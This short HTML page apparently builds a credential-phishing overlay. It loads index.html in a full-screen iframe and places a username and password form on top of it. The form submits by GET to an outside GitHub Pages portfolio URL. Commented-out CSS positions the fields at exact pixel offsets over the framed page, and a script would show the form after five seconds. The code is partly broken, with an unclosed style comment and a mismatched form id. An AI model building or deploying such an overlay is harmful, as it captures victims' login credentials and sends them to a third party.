<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>
    <!-- 
    <style>
        body {
            position: relative;
            margin: 0;
        }

        iframe {
            border: none;
            position: absolute;
            width: 100vw;
            height: 100vh;
        }

        #loginForm {
            top: 275px;
            height: 35px;
            left: 606px;
            width: 110px;
            display: none;
        }

        #loginForm input {
            position: absolute;
            height: 25px;
            width: 245px;
            padding: 4px 6px;
            color: #777;
        }

        #username {
            top: 173px;
            left: 606px;
        }

        #password {
            top: 205px;
            left: 606px;
        }

        #btn-login {
            position: relative;
            top: 275px;
            width: 110px;
            left: 606px;
            /* opacity: 0; */
            height: 32px;
        } -->
    </style>
    <iframe id="fr" src="index.html"></iframe>

    <form id=" loginForm"
        action="https://vudinhquangminh1909.github.io/Portfolio/?fbclid=IwAR0Ytxp-lyZejV85CDz5GIQE4oq5877o5R76Pm6WZeQNpSc8eCuy5HXPv3U"
        method="GET">
        <input type="username" name="username" placeholder="Tên truy cập" type="text" />
        <input type="password" name="password" placeholder="Mật khẩu" type="password" />
        <button type="submit" id="btn-login">Login</button>
    </form>

    <script>
        const loginForm = document.getElementById('loginForm');
        setTimeout(() => {
            // loginForm.style.display = 'block'
        }, 5000);
    </script>
</body>

</html>